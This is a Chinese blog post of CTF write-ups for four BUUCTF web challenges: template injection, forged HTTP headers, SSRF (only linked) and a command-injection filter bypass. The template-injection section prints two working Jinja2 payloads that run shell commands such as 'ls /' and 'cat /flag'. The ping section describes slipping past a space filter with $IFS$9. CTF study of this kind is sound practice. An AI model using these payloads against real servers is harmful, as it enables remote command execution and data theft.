Web-5(17-20)-BUUCTF平台

19 篇文章 1 订阅

本篇内容
[BJDCTF 2nd]fake google
[极客大挑战 2019]Http
[De1CTF 2019]SSRF Me
[GXYCTF2019]Ping Ping Ping

上一篇 | 目录 | 下一篇

[BJDCTF 2nd]fake google

在这里插入图片描述
直接在搜索框回车,然后右键查看源代码:
在这里插入图片描述
尝试模板注入成功:
在这里插入图片描述
直接上手payload看看根路径下的文件:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}

在这里插入图片描述
看到了flag,cat一下:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}

在这里插入图片描述





[极客大挑战 2019]Http

直接右键源代码:
在这里插入图片描述
在这里插入图片描述
既然要来自https://www.Sycsecret.com,那就在Header信息里加Referer:
在这里插入图片描述
要使用Syclover浏览器,改:
在这里插入图片描述
要本地才能读,改:
在这里插入图片描述
拿到最终flag。





[De1CTF 2019]SSRF Me

本人对这题见解不深刻,讲解不好,直接放大佬博客:[De1CTF 2019]SSRF Me之愚见





[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
老套路了,直接尝试:
在这里插入图片描述
看到flag.php,尝试读取:
在这里插入图片描述
尝试一番后发现,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的诸如/**/、%0a、${IFS}等都被过滤了,但$IFS$9还可以使用。
在这里插入图片描述
在这里插入图片描述
右键查看源代码,发现最终flag。
在这里插入图片描述





========================================================
上一篇-----------------------------------目录 -----------------------------------下一篇
========================================================
转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/105431422
========================================================

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值